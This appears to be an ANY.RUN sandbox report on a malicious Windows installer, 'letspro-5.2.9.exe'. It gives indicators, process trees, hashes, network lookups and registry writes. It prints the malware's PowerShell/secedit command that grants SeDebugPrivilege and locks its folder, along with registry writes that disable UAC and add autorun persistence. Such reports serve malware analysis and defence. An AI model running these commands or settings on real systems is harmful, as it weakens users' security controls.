File name: letspro-5.2.9.exe

Full analysis: https://app.any.run/tasks/a072fce9-80d0-42a1-9176-7c70ba31e325
Verdict: Malicious activity
Analysis date: May 21, 2025, 19:56:42
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: auto-reg, lua
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5: 9AF2A842E57624C00F5A3C946D9A95CD
SHA1: 23301B034C72DB35F8A306CF0B1E5AC0EC7AF9CB
SHA256: 26357C799752CE0EA03946D2816A1C69F9B9D2A768F486AF9277025D43A7333F
SSDEEP: 196608:tDcjfVmKbOkOisgbxI1VfVOuWIzU1K2zZawW:tDsftbOkOPgb6dOXSUFZDW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • letspro-5.2.9.exe (PID: 1660)
    • Antivirus name has been found in the command line (generic signature)

      • powershell.exe (PID: 4756)
    • Changes the autorun value in the registry

      • iusb3mon.exe (PID: 1128)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 4300)
    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 1128)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
    • Reads security settings of Internet Explorer

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • ShellExperienceHost.exe (PID: 5740)
    • Reads the date of Windows installation

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
    • Reads the Windows owner or organization settings

      • irsetup.exe (PID: 6540)
    • Starts POWERSHELL.EXE for commands execution

      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
    • Get information on the list of running processes

      • irsetup.exe (PID: 6540)
    • The process drops C-runtime libraries

      • irsetup.exe (PID: 6540)
    • Process drops legitimate windows executable

      • irsetup.exe (PID: 6540)
    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 1128)
    • There is functionality for taking screenshot (YARA)

      • iusb3mon.exe (PID: 1128)
    • Removes files via Powershell

      • powershell.exe (PID: 2616)
      • powershell.exe (PID: 5960)
    • Manipulates environment variables

      • powershell.exe (PID: 2616)
      • powershell.exe (PID: 5960)
    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 1128)
    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 1128)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5960)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 5960)
    • Connects to unusual port

      • iusb3mon.exe (PID: 1128)
  • INFO

    • Create files in a temporary directory

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • SecEdit.exe (PID: 4024)
      • SecEdit.exe (PID: 2908)
    • The sample compiled with english language support

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
    • Reads the computer name

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • ShellExperienceHost.exe (PID: 5740)
    • Checks supported languages

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • iusb3mon.exe (PID: 812)
      • ShellExperienceHost.exe (PID: 5740)
    • Process checks computer location settings

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5392)
      • powershell.exe (PID: 4756)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 5436)
      • powershell.exe (PID: 6272)
    • Creates files or folders in the user directory

      • irsetup.exe (PID: 6540)
    • The process uses Lua

      • irsetup.exe (PID: 6540)
    • The sample compiled with chinese language support

      • irsetup.exe (PID: 6540)
    • Creates files in the program directory

      • irsetup.exe (PID: 6540)
    • Auto-launch of the file from Registry key

      • iusb3mon.exe (PID: 1128)
    • Process checks whether UAC notifications are on

      • iusb3mon.exe (PID: 1128)
    • Manual execution by a user

      • iusb3mon.exe (PID: 812)
    • Reads the software policy settings

      • slui.exe (PID: 7148)
    • Checks proxy server information

      • slui.exe (PID: 7148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 49664
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 9.1.0.0
ProductVersionNumber: 9.1.0.0
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: Created with Setup Factory
FileDescription: Setup Application
FileVersion: 9.1.0.0
InternalName: suf_launch
LegalCopyright: Setup Engine Copyright © 2004-2012 Indigo Rose Corporation
LegalTrademarks: Setup Factory is a trademark of Indigo Rose Corporation.
OriginalFileName: suf_launch.exe
ProductName: Setup Factory Runtime
ProductVersion: 9.1.0.0
No data.
All screenshots are available in the full report
Total processes: 156
Monitored processes: 31
Malicious processes: 3
Suspicious processes: 2

Behavior graph

start; letspro-5.2.9.exe; irsetup.exe; powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); iusb3mon.exe; rundll32.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); schtasks.exe (no specs); powershell.exe (no specs); powershell.exe (no specs); conhost.exe (no specs); conhost.exe (no specs); shellexperiencehost.exe (no specs); secedit.exe (no specs); secedit.exe (no specs); iusb3mon.exe (no specs); slui.exe; letspro-5.2.9.exe (no specs)

Process information

PID | CMD | Path | Indicators | Parent process
PID: 812
CMD: C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
Path: C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
Parent process: explorer.exe
User: admin
Company: 腾讯科技(深圳)有限公司
Integrity Level: MEDIUM
Description: 腾讯课堂
Exit code: 0
Version: 4, 6, 1, 2
Modules
Images
c:\users\admin\appdata\local\appdata\iusb3mon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\shell32.dll
PID: 1128
CMD: "C:\Users\admin\AppData\Local\AppData\iusb3mon.exe"
Path: C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
Parent process: irsetup.exe
User: admin
Company: 腾讯科技(深圳)有限公司
Integrity Level: HIGH
Description: 腾讯课堂
Version: 4, 6, 1, 2
Modules
Images
c:\users\admin\appdata\local\appdata\iusb3mon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ucrtbase.dll
PID: 1244
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1324
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: irsetup.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
PID: 1660
CMD: "C:\Users\admin\AppData\Local\Temp\letspro-5.2.9.exe"
Path: C:\Users\admin\AppData\Local\Temp\letspro-5.2.9.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Description: Setup Application
Exit code: 3221226540
Version: 9.1.0.0
Modules
Images
c:\users\admin\appdata\local\temp\letspro-5.2.9.exe
c:\windows\system32\ntdll.dll
PID: 2616
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2616
CMD: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\Users\admin\AppData\Local\AppData",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: iusb3mon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 2908
CMD: "C:\WINDOWS\system32\SecEdit.exe" /configure /db C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Path: C:\Windows\SysWOW64\SecEdit.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Security Configuration Editor Command Tool
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\secedit.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\scecli.dll
PID: 3676
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4024
CMD: "C:\WINDOWS\system32\SecEdit.exe" /configure /db C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Path: C:\Windows\SysWOW64\SecEdit.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Security Configuration Editor Command Tool
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\secedit.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\scecli.dll
Total events: 40 873
Read events: 40 863
Write events: 8
Delete events: 2

Modification events

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Miscrosoft
Value: C:\Users\admin\AppData\Local\AppData\iusb3mon.exe

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Miscrosoft
Value: C:\Users\admin\AppData\Local\AppData\iusb3mon.exe

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: ConsentPromptBehaviorAdmin
Value: 0

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: EnableLUA
Value: 0

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: PromptOnSecureDesktop
Value: 0

(PID) Process: (5740) ShellExperienceHost.exe
Key: \REGISTRY\A\{887107ec-4bbc-3011-75b4-879bf27dc43e}\LocalState
Operation: write
Name: PeekBadges
Value: 5B005D000000E4B176988ACADB01

(PID) Process: (2908) SecEdit.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation: delete value
Name: LastWinlogonConfig
Value:

(PID) Process: (4024) SecEdit.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation: delete value
Name: LastWinlogonConfig
Value:

(PID) Process: (1128) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: DisableLockWorkstation
Value: 0
Executable files: 7
Suspicious files: 5
Text files: 23
Unknown types: 0

Dropped files

PID | Process | Filename | Type
5892 | letspro-5.2.9.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | executable
MD5:2A7D5F8D3FB4AB753B226FD88D31453B
SHA256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
6540 | irsetup.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG | image
MD5:3220A6AEFB4FC719CC8849F060859169
SHA256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
1324 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rcpjv2hr.1lt.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5892 | letspro-5.2.9.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll | executable
MD5:958103E55C74427E5C66D7E18F3BF237
SHA256:3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
6540 | irsetup.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat | binary
MD5:C807431EB8A80C3505150966D5004B2C
SHA256:35147BE2995F0CC211A7022C7C77061BFD5D2CF73491798BFC8F092D9E9DFA87
6540 | irsetup.exe | C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG | image
MD5:AC40DED6736E08664F2D86A65C47EF60
SHA256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
5072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wqtbmt4o.ef5.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_agmde55c.bin.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vg1fiqdw.3hp.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rw3dk0gl.nyc.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 92
DNS requests: 16
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2104 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | QA | binary | 868 b | whitelisted
5084 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | DE | binary | 419 b | whitelisted
5084 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | DE | binary | 407 b | whitelisted
6544 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | binary | 471 b | whitelisted
2104 | svchost.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | RU | binary | 825 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2104 | svchost.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
2104 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
5084 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5084 | SIHClient.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5084 | SIHClient.exe | 40.69.42.241:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain | IP | Reputation
google.com | 216.58.206.78 | whitelisted
settings-win.data.microsoft.com | 51.104.136.2 | whitelisted
crl.microsoft.com | 2.16.168.114, 2.16.168.124 | whitelisted
www.microsoft.com | 2.23.246.101, 184.30.21.171 | whitelisted
client.wns.windows.com | 172.211.123.250 | whitelisted
slscr.update.microsoft.com | 4.175.87.197 | whitelisted
fe3cr.delivery.mp.microsoft.com | 40.69.42.241 | whitelisted
jjiiee.com | 27.124.34.146 | unknown
activation-v2.sls.microsoft.com | 40.91.76.224 | whitelisted
nexusrules.officeapps.live.com | 52.111.227.14 | whitelisted

Threats

No threats detected
No debug info